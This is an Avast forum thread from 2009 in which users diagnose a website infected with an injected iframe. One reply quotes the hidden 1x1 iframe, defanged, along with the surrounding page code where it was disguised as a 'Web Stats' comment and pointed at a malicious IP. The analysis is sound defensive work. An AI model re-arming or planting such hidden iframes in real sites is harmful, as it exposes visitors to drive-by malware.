Avast WEBforum

Other => Viruses and worms => Topic started by: aj023 on May 02, 2009, 09:58:17 AM

Title: Iframe-html and redirecting to another website on www.queenscentral.com
Post by: aj023 on May 02, 2009, 09:58:17 AM

www.queenscentral.com is giving me an error saying there is an iframe-html virus and gives me a Network Shield: blocked access to malicious site 74.222.134.170/stats.php?id=2 [ C:\Program Files\Mozilla Firefox\firefox.exe ( 5056 ) ]

I spoke to the webmaster who doesn't know how to remove this virus or even know he has it and didn't know about it till I mentioned it. 

I contacted the abuse @ the above IP address who I gave info on this to and he tells me he doesn't see anything on his end and says he contacted the owner of the IP to check his server. 

Can someone verify if there is an IFRAME-HTML manipulation here and what is going on? 

Title: Re: Iframe-html and redirecting to another website on www.queenscentral.com
Post by: CharleyO on May 02, 2009, 10:31:03 AM

***

Welcome to the forums, aj023.   :)

I checked the source code of the link you supplied. Here is the offending iframe infection :

<eyeframe src=http://74.222.134.170/stats.php?id=2
(broken code)
width=1 height=1 frameborder=0></eyeframe>

I will post some of the other code before and after the iframe infection so it will be easier to find :

<p> </p>
<p>Here&#8217;s an <a href="hXXp://www.youtube.com/watch?v=-HazQlWgdzg" target="_blank">instructional video</a> to inform<!-- Web Stats --> <eyeframe src=http://74.222.134.170/stats.php?id=2
(broken code)
width=1 height=1 frameborder=0></eyeframe> <!-- End Web Stats --> you about pickpocketing.</p>
<p> </p>

You can now report this to the webmaster and include a link to this thread. Use this link :

http://forum.avast.com/index.php?topic=44842.msg375383#msg375383

(code broken between the "2" and "width.")

In the code above :

eyeframe = iframe

XX = tt


***

Title: Re: Iframe-html and redirecting to another website on www.queenscentral.com
Post by: CharleyO on May 02, 2009, 10:45:02 AM

***

Information about IP address 74.222.134.170  :

https://safeweb.norton.com/report/show?name=74.222.134.170


***

Title: Re: Iframe-html and redirecting to another website on www.queenscentral.com
Post by: DavidR on May 02, 2009, 05:25:17 PM

CharelyO, You have to be careful in posting the actual iframe tag as it could result in this page actually being pinged by avast, that is generally why I post images of the tags/code.

Break it over two lines, etc. change the http to hXXp as usual, change the < and > characters to ^ so it can't be interpreted by a browser as a legit code and possibly be actioned, e.g. ^iframe^ ^/iframe^

The placement of an iframe within a sentence is in its own right is suspect.

Title: Re: Iframe-html and redirecting to another website on www.queenscentral.com
Post by: CharleyO on May 03, 2009, 07:19:15 AM

***

OOPS ... thanks, David.    :-[

I will use images from now on.


***

Title: Re: Iframe-html and redirecting to another website on www.queenscentral.com
Post by: DavidR on May 03, 2009, 05:51:02 PM

No problem, nice touch with changing it to eyeframe though; those who know will understand it is iframe ;D